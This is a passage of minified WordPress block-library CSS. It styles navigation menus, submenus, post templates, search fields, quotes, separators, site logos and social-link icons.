.wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{ text-decoration:underline; } .wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{ text-decoration:line-through; } .wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){ text-decoration:none; } .wp-block-navigation .wp-block-navigation__submenu-icon{ align-self:center; background-color:inherit; border:none; color:currentColor; display:inline-block; font-size:inherit; height:.6em; line-height:0; margin-left:.25em; padding:0; width:.6em; } .wp-block-navigation .wp-block-navigation__submenu-icon svg{ display:inline-block; stroke:currentColor; height:inherit; margin-top:.075em; width:inherit; } .wp-block-navigation{ --navigation-layout-justification-setting:flex-start; --navigation-layout-direction:row; --navigation-layout-wrap:wrap; --navigation-layout-justify:flex-start; --navigation-layout-align:center; } .wp-block-navigation.is-vertical{ --navigation-layout-direction:column; --navigation-layout-justify:initial; --navigation-layout-align:flex-start; } .wp-block-navigation.no-wrap{ --navigation-layout-wrap:nowrap; } .wp-block-navigation.items-justified-center{ --navigation-layout-justification-setting:center; --navigation-layout-justify:center; } .wp-block-navigation.items-justified-center.is-vertical{ --navigation-layout-align:center; } .wp-block-navigation.items-justified-right{ --navigation-layout-justification-setting:flex-end; --navigation-layout-justify:flex-end; } .wp-block-navigation.items-justified-right.is-vertical{ --navigation-layout-align:flex-end; } .wp-block-navigation.items-justified-space-between{ --navigation-layout-justification-setting:space-between; --navigation-layout-justify:space-between; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ align-items:normal; background-color:inherit; color:inherit; display:flex; flex-direction:column; opacity:0; position:absolute; z-index:2; } @media not (prefers-reduced-motion){ .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ transition:opacity .1s linear; } } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ height:0; overflow:hidden; visibility:hidden; width:0; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{ display:flex; flex-grow:1; padding:.5em 1em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{ margin-left:auto; margin-right:0; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{ margin:0; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ left:-1px; top:100%; } @media (min-width:782px){ .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; top:-1px; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:#0000; content:""; display:block; height:100%; position:absolute; right:100%; width:.5em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{ margin-right:.25em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{ transform:rotate(-90deg); } } .wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{ left:0; top:100%; } @media (min-width:782px){ .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; top:0; } } .wp-block-navigation-submenu{ display:flex; position:relative; } .wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{ stroke:currentColor; } button.wp-block-navigation-item__content{ background-color:initial; border:none; color:currentColor; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; text-align:left; text-transform:inherit; } .wp-block-navigation-submenu__toggle{ cursor:pointer; } .wp-block-navigation-submenu__toggle[aria-expanded=true]+.wp-block-navigation__submenu-icon>svg,.wp-block-navigation-submenu__toggle[aria-expanded=true]>svg{ transform:rotate(180deg); } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{ padding-left:0; padding-right:.85em; } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{ margin-left:-.6em; pointer-events:none; } .wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){ padding:0; } .wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{ gap:inherit; } :where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){ padding:.5em 1em; } :where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){ padding:.5em 1em; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{ left:auto; right:0; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:-1px; right:-1px; } @media (min-width:782px){ .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:auto; right:100%; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{ background-color:#fff; border:1px solid #00000026; } .wp-block-navigation.has-background .wp-block-navigation__submenu-container{ background-color:inherit; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{ color:#000; } .wp-block-navigation__container{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); list-style:none; margin:0; padding-left:0; } .wp-block-navigation__container .is-responsive{ display:none; } .wp-block-navigation__container:only-child,.wp-block-page-list:only-child{ flex-grow:1; } @keyframes overlay-menu__fade-in-animation{ 0%{ opacity:0; transform:translateY(.5em); } to{ opacity:1; transform:translateY(0); } } .wp-block-navigation__responsive-container{ bottom:0; display:none; left:0; position:fixed; right:0; top:0; } .wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){ color:inherit; } .wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){ background-color:inherit !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open{ background-color:inherit; display:flex; flex-direction:column; } @media not (prefers-reduced-motion){ .wp-block-navigation__responsive-container.is-menu-open{ animation:overlay-menu__fade-in-animation .1s ease-out; animation-fill-mode:forwards; } } .wp-block-navigation__responsive-container.is-menu-open{ overflow:auto; padding:clamp(1rem, var(--wp--style--root--padding-top), 20rem) clamp(1rem, var(--wp--style--root--padding-right), 20rem) clamp(1rem, var(--wp--style--root--padding-bottom), 20rem) clamp(1rem, var(--wp--style--root--padding-left), 20rem); z-index:100000; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-justification-setting, inherit); display:flex; flex-direction:column; flex-wrap:nowrap; overflow:visible; padding-top:calc(2rem + 24px); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ justify-content:flex-start; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{ border:none; height:auto; min-width:200px; opacity:1; overflow:initial; padding-left:2rem; padding-right:2rem; position:static; visibility:visible; width:auto; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ gap:inherit; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ padding-top:var(--wp--style--block-gap, 2em); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{ padding:0; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ align-items:var(--navigation-layout-justification-setting, initial); display:flex; flex-direction:column; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{ background:#0000 !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ left:auto; right:auto; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){ background-color:inherit; display:block; position:relative; width:100%; z-index:auto; } .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ left:0; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{ background-color:#fff; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{ color:#000; } .wp-block-navigation__toggle_button_label{ font-size:1rem; font-weight:700; } .wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{ background:#0000; border:none; color:currentColor; cursor:pointer; margin:0; padding:0; text-transform:inherit; vertical-align:middle; } .wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{ fill:currentColor; display:block; height:24px; pointer-events:none; width:24px; } .wp-block-navigation__responsive-container-open{ display:flex; } .wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ font-family:inherit; font-size:inherit; font-weight:inherit; } @media (min-width:600px){ .wp-block-navigation__responsive-container-open:not(.always-shown){ display:none; } } .wp-block-navigation__responsive-container-close{ position:absolute; right:0; top:0; z-index:2; } .wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{ font-family:inherit; font-size:inherit; font-weight:inherit; } .wp-block-navigation__responsive-close{ width:100%; } .has-modal-open .wp-block-navigation__responsive-close{ margin-left:auto; margin-right:auto; max-width:var(--wp--style--global--wide-size, 100%); } .wp-block-navigation__responsive-close:focus{ outline:none; } .is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{ box-sizing:border-box; } .wp-block-navigation__responsive-dialog{ position:relative; } .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:46px; } @media (min-width:782px){ .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:32px; } } html.has-modal-open{ overflow:hidden; } .wp-block-navigation .wp-block-navigation-item__label{ overflow-wrap:break-word; } .wp-block-navigation .wp-block-navigation-item__description{ display:none; } .link-ui-tools{ outline:1px solid #f0f0f0; padding:8px; } .link-ui-block-inserter{ padding-top:8px; } .link-ui-block-inserter__back{ margin-left:8px; text-transform:uppercase; } .wp-block-navigation .wp-block-page-list{ align-items:var(--navigation-layout-align, initial); background-color:inherit; display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation .wp-block-navigation-item{ background-color:inherit; } .wp-block-page-list{ box-sizing:border-box; } .is-small-text{ font-size:.875em; } .is-regular-text{ font-size:1em; } .is-large-text{ font-size:2.25em; } .is-larger-text{ font-size:3em; } .has-drop-cap:not(:focus):first-letter{ float:left; font-size:8.4em; font-style:normal; font-weight:100; line-height:.68; margin:.05em .1em 0 0; text-transform:uppercase; } body.rtl .has-drop-cap:not(:focus):first-letter{ float:none; margin-left:.1em; } p.has-drop-cap.has-background{ overflow:hidden; } :root :where(p.has-background){ padding:1.25em 2.375em; } :where(p.has-text-color:not(.has-link-color)) a{ color:inherit; } p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{ rotate:180deg; } .wp-block-post-author{ box-sizing:border-box; display:flex; flex-wrap:wrap; } .wp-block-post-author__byline{ font-size:.5em; margin-bottom:0; margin-top:0; width:100%; } .wp-block-post-author__avatar{ margin-right:1em; } .wp-block-post-author__bio{ font-size:.7em; margin-bottom:.7em; } .wp-block-post-author__content{ flex-basis:0; flex-grow:1; } .wp-block-post-author__name{ margin:0; } .wp-block-post-author-biography{ box-sizing:border-box; } :where(.wp-block-post-comments-form input:not([type=submit])),:where(.wp-block-post-comments-form textarea){ border:1px solid #949494; font-family:inherit; font-size:1em; } :where(.wp-block-post-comments-form input:where(:not([type=submit]):not([type=checkbox]))),:where(.wp-block-post-comments-form textarea){ padding:calc(.667em + 2px); } .wp-block-post-comments-form{ box-sizing:border-box; } .wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){ font-weight:inherit; } .wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){ font-family:inherit; } .wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){ font-size:inherit; } .wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){ line-height:inherit; } .wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){ font-style:inherit; } .wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){ letter-spacing:inherit; } .wp-block-post-comments-form :where(input[type=submit]){ box-shadow:none; cursor:pointer; display:inline-block; overflow-wrap:break-word; text-align:center; } .wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-post-comments-form .comment-reply-title{ margin-bottom:0; } .wp-block-post-comments-form .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-left:.5em; } .wp-block-post-comments-count{ box-sizing:border-box; } .wp-block-post-content{ display:flow-root; } .wp-block-post-comments-link,.wp-block-post-date{ box-sizing:border-box; } :where(.wp-block-post-excerpt){ box-sizing:border-box; margin-bottom:var(--wp--style--block-gap); margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__excerpt{ margin-bottom:0; margin-top:0; } .wp-block-post-excerpt__more-text{ margin-bottom:0; margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__more-link{ display:inline-block; } .wp-block-post-featured-image{ margin-left:0; margin-right:0; } .wp-block-post-featured-image a{ display:block; height:100%; } .wp-block-post-featured-image :where(img){ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; width:100%; } .wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{ width:100%; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{ background-color:#000; inset:0; position:absolute; } .wp-block-post-featured-image{ position:relative; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{ background-color:initial; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{ opacity:0; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{ opacity:.1; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{ opacity:.2; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{ opacity:.3; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{ opacity:.4; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{ opacity:.5; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{ opacity:.6; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{ opacity:.7; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{ opacity:.8; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{ opacity:.9; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{ opacity:1; } .wp-block-post-featured-image:where(.alignleft,.alignright){ width:100%; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{ display:inline-block; margin-right:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{ display:inline-block; margin-left:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{ rotate:180deg; } .wp-block-post-terms{ box-sizing:border-box; } .wp-block-post-terms .wp-block-post-terms__separator{ white-space:pre-wrap; } .wp-block-post-time-to-read,.wp-block-post-title{ box-sizing:border-box; } .wp-block-post-title{ word-break:break-word; } .wp-block-post-title :where(a){ display:inline-block; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; text-decoration:inherit; } .wp-block-post-author-name,.wp-block-preformatted{ box-sizing:border-box; } .wp-block-preformatted{ white-space:pre-wrap; } :where(.wp-block-preformatted.has-background){ padding:1.25em 2.375em; } .wp-block-pullquote{ box-sizing:border-box; margin:0 0 1em; overflow-wrap:break-word; padding:4em 0; text-align:center; } .wp-block-pullquote blockquote,.wp-block-pullquote p{ color:inherit; } .wp-block-pullquote blockquote{ margin:0; } .wp-block-pullquote p{ margin-top:0; } .wp-block-pullquote p:last-child{ margin-bottom:0; } .wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{ max-width:420px; } .wp-block-pullquote cite,.wp-block-pullquote footer{ position:relative; } .wp-block-pullquote .has-text-color a{ color:inherit; } .wp-block-pullquote.has-text-align-left blockquote{ text-align:left; } .wp-block-pullquote.has-text-align-right blockquote{ text-align:right; } .wp-block-pullquote.has-text-align-center blockquote{ text-align:center; } .wp-block-pullquote.is-style-solid-color{ border:none; } .wp-block-pullquote.is-style-solid-color blockquote{ margin-left:auto; margin-right:auto; max-width:60%; } .wp-block-pullquote.is-style-solid-color blockquote p{ font-size:2em; margin-bottom:0; margin-top:0; } .wp-block-pullquote.is-style-solid-color blockquote cite{ font-style:normal; text-transform:none; } .wp-block-pullquote :where(cite){ color:inherit; display:block; } .wp-block-post-template{ box-sizing:border-box; list-style:none; margin-bottom:0; margin-top:0; max-width:100%; padding:0; } .wp-block-post-template.is-flex-container{ display:flex; flex-direction:row; flex-wrap:wrap; gap:1.25em; } .wp-block-post-template.is-flex-container>li{ margin:0; width:100%; } @media (min-width:600px){ .wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{ width:calc(50% - .625em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{ width:calc(33.33333% - .83333em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{ width:calc(25% - .9375em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{ width:calc(20% - 1em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{ width:calc(16.66667% - 1.04167em); } } @media (max-width:600px){ .wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{ grid-template-columns:1fr; } } .wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{ float:right; margin-inline-end:0; margin-inline-start:2em; } .wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{ float:left; margin-inline-end:2em; margin-inline-start:0; } .wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{ margin-inline-end:auto; margin-inline-start:auto; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{ margin-inline-start:auto; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{ margin-inline-end:auto; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow{ display:inline-block; margin-right:1ch; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-query-pagination .wp-block-query-pagination-next-arrow{ display:inline-block; margin-left:1ch; } .wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-query-pagination.aligncenter{ justify-content:center; } .wp-block-query-title,.wp-block-query-total,.wp-block-quote{ box-sizing:border-box; } .wp-block-quote{ overflow-wrap:break-word; } .wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){ margin-bottom:1em; padding:0 1em; } .wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{ font-size:1.5em; font-style:italic; line-height:1.6; } .wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{ font-size:1.125em; text-align:right; } .wp-block-quote>cite{ display:block; } .wp-block-read-more{ display:block; width:fit-content; } .wp-block-read-more:where(:not([style*=text-decoration])){ text-decoration:none; } .wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{ text-decoration:none; } ul.wp-block-rss.alignleft{ margin-right:2em; } ul.wp-block-rss.alignright{ margin-left:2em; } ul.wp-block-rss.is-grid{ display:flex; flex-wrap:wrap; padding:0; } ul.wp-block-rss.is-grid li{ margin:0 1em 1em 0; width:100%; } @media (min-width:600px){ ul.wp-block-rss.columns-2 li{ width:calc(50% - 1em); } ul.wp-block-rss.columns-3 li{ width:calc(33.33333% - 1em); } ul.wp-block-rss.columns-4 li{ width:calc(25% - 1em); } ul.wp-block-rss.columns-5 li{ width:calc(20% - 1em); } ul.wp-block-rss.columns-6 li{ width:calc(16.66667% - 1em); } } .wp-block-rss__item-author,.wp-block-rss__item-publish-date{ display:block; font-size:.8125em; } .wp-block-rss{ box-sizing:border-box; list-style:none; padding:0; } .wp-block-search__button{ margin-left:10px; word-break:normal; } .wp-block-search__button.has-icon{ line-height:0; } .wp-block-search__button svg{ height:1.25em; min-height:24px; min-width:24px; width:1.25em; fill:currentColor; vertical-align:text-bottom; } :where(.wp-block-search__button){ border:1px solid #ccc; padding:6px 10px; } .wp-block-search__inside-wrapper{ display:flex; flex:auto; flex-wrap:nowrap; max-width:100%; } .wp-block-search__label{ width:100%; } .wp-block-search.wp-block-search__button-only .wp-block-search__button{ box-sizing:border-box; display:flex; flex-shrink:0; justify-content:center; margin-left:0; max-width:100%; } .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{ min-width:0 !important; transition-property:width; } .wp-block-search.wp-block-search__button-only .wp-block-search__input{ flex-basis:100%; transition-duration:.3s; } .wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{ overflow:hidden; } .wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{ border-left-width:0 !important; border-right-width:0 !important; flex-basis:0; flex-grow:0; margin:0; min-width:0 !important; padding-left:0 !important; padding-right:0 !important; width:0 !important; } :where(.wp-block-search__input){ appearance:none; border:1px solid #949494; flex-grow:1; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; margin-left:0; margin-right:0; min-width:3rem; padding:8px; text-decoration:unset !important; text-transform:inherit; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){ background-color:#fff; border:1px solid #949494; box-sizing:border-box; padding:4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{ border:none; border-radius:0; padding:0 4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{ outline:none; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){ padding:4px 8px; } .wp-block-search.aligncenter .wp-block-search__inside-wrapper{ margin:auto; } .wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{ float:right; } .wp-block-separator{ border:none; border-top:2px solid; } :root :where(.wp-block-separator.is-style-dots){ height:auto; line-height:1; text-align:center; } :root :where(.wp-block-separator.is-style-dots):before{ color:currentColor; content:"···"; font-family:serif; font-size:1.5em; letter-spacing:2em; padding-left:2em; } .wp-block-separator.is-style-dots{ background:none !important; border:none !important; } .wp-block-site-logo{ box-sizing:border-box; line-height:0; } .wp-block-site-logo a{ display:inline-block; line-height:0; } .wp-block-site-logo.is-default-size img{ height:auto; width:120px; } .wp-block-site-logo img{ height:auto; max-width:100%; } .wp-block-site-logo a,.wp-block-site-logo img{ border-radius:inherit; } .wp-block-site-logo.aligncenter{ margin-left:auto; margin-right:auto; text-align:center; } :root :where(.wp-block-site-logo.is-style-rounded){ border-radius:9999px; } .wp-block-site-tagline,.wp-block-site-title{ box-sizing:border-box; } .wp-block-site-title :where(a){ color:inherit; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; text-decoration:inherit; } .wp-block-social-links{ background:none; box-sizing:border-box; margin-left:0; padding-left:0; padding-right:0; text-indent:0; } .wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{ border-bottom:0; box-shadow:none; text-decoration:none; } .wp-block-social-links .wp-social-link svg{ height:1em; width:1em; } .wp-block-social-links .wp-social-link span:not(.screen-reader-text){ font-size:.65em; margin-left:.5em; margin-right:.5em; } .wp-block-social-links.has-small-icon-size{ font-size:16px; } .wp-block-social-links,.wp-block-social-links.has-normal-icon-size{ font-size:24px; } .wp-block-social-links.has-large-icon-size{ font-size:36px; } .wp-block-social-links.has-huge-icon-size{ font-size:48px; } .wp-block-social-links.aligncenter{ display:flex; justify-content:center; } .wp-block-social-links.alignright{ justify-content:flex-end; } .wp-block-social-link{ border-radius:9999px; display:block; } @media not (prefers-reduced-motion){ .wp-block-social-link{ transition:transform .1s ease; } } .wp-block-social-link{ height:auto; } .wp-block-social-link a{ align-items:center; display:flex; line-height:0; } .wp-block-social-link:hover{ transform:scale(1.1); } .wp-block-social-links .wp-block-social-link.wp-social-link{ display:inline-block; margin:0; padding:0; } .wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link 